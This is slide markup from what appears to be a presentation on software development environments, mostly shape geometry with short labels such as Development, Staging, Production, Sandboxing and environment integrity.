                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="930909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6647" y="980420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25409" y="1024899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54514" y="1062577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92192" y="1091682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136671" y="1110444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186181" y="1117091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2758185" y="1117091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807696" y="1110444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2852175" y="1091682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2889853" y="1062577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2918958" y="1024899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2937720" y="980420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2944368" y="930909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2944368" y="186181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2937720" y="136671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2918958" y="92192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2889853" y="54514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2852175" y="25409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807696" y="6647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2758185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188709" y="3796029"/>
            <a:ext cx="40386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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>QA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8077390" y="4337494"/>
            <a:ext cx="3300729" cy="2921635"/>
            <a:chOff x="8077390" y="4337494"/>
            <a:chExt cx="3300729" cy="2921635"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8091678" y="4351782"/>
              <a:ext cx="3272154" cy="2893060"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3272154" h="2893059">
                  <a:moveTo>
                    <a:pt x="2999486" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="272542" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223559" y="4391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177453" y="17053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134996" y="37215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96957" y="64106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64106" y="96957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37215" y="134996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17053" y="177453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4391" y="223559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="272541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2620010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4391" y="2668992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17053" y="2715098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37215" y="2757555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64106" y="2795594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96957" y="2828445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134996" y="2855336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177453" y="2875498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223559" y="2888160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272542" y="2892551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2999486" y="2892551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048468" y="2888160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3094574" y="2875498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3137031" y="2855336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175070" y="2828445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207921" y="2795594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234812" y="2757555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3254974" y="2715098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3267636" y="2668992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3272028" y="2620010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3272028" y="272541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3267636" y="223559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3254974" y="177453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234812" y="134996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207921" y="96957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175070" y="64106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3137031" y="37215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3094574" y="17053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048468" y="4391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2999486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8091678" y="4351782"/>
              <a:ext cx="3272154" cy="2893060"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3272154" h="2893059">
                  <a:moveTo>
                    <a:pt x="0" y="272541"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4391" y="223559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17053" y="177453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37215" y="134996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64106" y="96957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96957" y="64106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134996" y="37215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177453" y="17053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223559" y="4391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272542" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2999486" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048468" y="4391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3094574" y="17053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3137031" y="37215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175070" y="64106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207921" y="96957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234812" y="134996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3254974" y="177453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3267636" y="223559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3272028" y="272541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3272028" y="2620010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3267636" y="2668992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3254974" y="2715098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234812" y="2757555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207921" y="2795594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175070" y="2828445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3137031" y="2855336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3094574" y="2875498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048468" y="2888160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2999486" y="2892551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272542" y="2892551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223559" y="2888160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177453" y="2875498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134996" y="2855336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96957" y="2828445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64106" y="2795594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37215" y="2757555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17053" y="2715098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4391" y="2668992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2620010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="272541"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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8300973" y="4981449"/>
            <a:ext cx="2767965" cy="1555750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7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Development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37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Tes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gration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37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Staging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37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Production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089392" y="3416808"/>
            <a:ext cx="3274060" cy="1117600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3274059" h="1117600">
                <a:moveTo>
                  <a:pt x="3087369" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="186181" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136671" y="6647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92192" y="25409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54514" y="54514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25409" y="92192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6647" y="136671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="186181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="930909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6647" y="980420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25409" y="1024899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54514" y="1062577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92192" y="1091682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136671" y="1110444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186181" y="1117091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3087369" y="1117091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3136880" y="1110444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3181359" y="1091682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3219037" y="1062577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3248142" y="1024899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3266904" y="980420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3273552" y="930909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3273552" y="186181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3266904" y="136671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3248142" y="92192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3219037" y="54514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3181359" y="25409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3136880" y="6647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3087369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8823452" y="3580231"/>
            <a:ext cx="1804670" cy="7207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4925">
              <a:lnSpc>
                <a:spcPct val="113999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Development </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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7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000" spc="-5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000" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>vironme</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="9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000" spc="35" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ts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1576494" y="4380166"/>
            <a:ext cx="3268979" cy="2921635"/>
            <a:chOff x="11576494" y="4380166"/>
            <a:chExt cx="3268979" cy="2921635"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="object 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11590781" y="4394453"/>
              <a:ext cx="3240405" cy="2893060"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3240405" h="2893059">
                  <a:moveTo>
                    <a:pt x="2967481" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="272542" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223559" y="4391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177453" y="17053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134996" y="37215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96957" y="64106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64106" y="96957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37215" y="134996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17053" y="177453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4391" y="223559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="272542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2620010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4391" y="2668992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17053" y="2715098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37215" y="2757555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64106" y="2795594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96957" y="2828445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134996" y="2855336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177453" y="2875498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223559" y="2888160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272542" y="2892552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2967481" y="2892552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016464" y="2888160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3062570" y="2875498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3105027" y="2855336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3143066" y="2828445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175917" y="2795594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202808" y="2757555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3222970" y="2715098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3235632" y="2668992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3240024" y="2620010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3240024" y="272542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3235632" y="223559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3222970" y="177453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202808" y="134996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175917" y="96957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3143066" y="64106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3105027" y="37215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3062570" y="17053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016464" y="4391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2967481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1590781" y="4394453"/>
              <a:ext cx="3240405" cy="2893060"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3240405" h="2893059">
                  <a:moveTo>
                    <a:pt x="0" y="272542"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4391" y="223559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17053" y="177453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37215" y="134996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64106" y="96957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96957" y="64106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134996" y="37215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177453" y="17053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223559" y="4391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272542" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2967481" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016464" y="4391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3062570" y="17053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3105027" y="37215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3143066" y="64106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175917" y="96957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202808" y="134996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3222970" y="177453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3235632" y="223559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3240024" y="272542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3240024" y="2620010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3235632" y="2668992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3222970" y="2715098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202808" y="2757555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3175917" y="2795594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3143066" y="2828445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3105027" y="2855336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3062570" y="2875498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016464" y="2888160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2967481" y="2892552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272542" y="2892552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223559" y="2888160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177453" y="2875498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134996" y="2855336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96957" y="2828445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64106" y="2795594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37215" y="2757555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17053" y="2715098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4391" y="2668992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2620010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="272542"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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11799823" y="5023002"/>
            <a:ext cx="2412365" cy="155638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7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Sandboxing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37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Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-14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baseline</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="217804" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="114100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Integrity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me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ment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1590019" y="3459479"/>
            <a:ext cx="3240405" cy="1117600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3240405" h="1117600">
                <a:moveTo>
                  <a:pt x="3053841" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="186181" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136671" y="6647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92192" y="25409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54514" y="54514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25409" y="92192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6647" y="136671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="186182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="930910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6647" y="980420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25409" y="1024899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54514" y="1062577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92192" y="1091682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136671" y="1110444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186181" y="1117092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3053841" y="1117092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3103352" y="1110444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3147831" y="1091682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3185509" y="1062577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3214614" y="1024899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3233376" y="980420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3240024" y="930910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3240024" y="186182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3233376" y="136671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3214614" y="92192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3185509" y="54514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3147831" y="25409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3103352" y="6647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3053841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11791950" y="3622749"/>
            <a:ext cx="2837815" cy="720090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="546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30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="25" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Preserving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35"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="65" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Environment</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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75" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>integrity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33038" y="306451"/>
            <a:ext cx="879030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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Software</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Development</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Environments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13732" y="760476"/>
            <a:ext cx="6804659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912745" y="1810639"/>
            <a:ext cx="1050099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image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below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shows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different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stages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Software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Development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Life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Cycle.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267967" y="2743200"/>
            <a:ext cx="13719175" cy="4979035"/>
            <a:chOff x="1267967" y="2743200"/>
            <a:chExt cx="13719175" cy="4979035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8200644" y="2743200"/>
              <a:ext cx="3321050" cy="4963795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3321050" h="4963795">
                  <a:moveTo>
                    <a:pt x="3320796" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4963668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3320796" y="4963668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332079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1666220" y="2743200"/>
              <a:ext cx="3321050" cy="4963795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3321050" h="4963795">
                  <a:moveTo>
                    <a:pt x="3320795" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4963668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3320795" y="4963668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3320795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117074" y="6456553"/>
              <a:ext cx="2980690" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2980690" h="142875">
                  <a:moveTo>
                    <a:pt x="2837306" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2837306" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2951708" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2851657" y="85725"/>
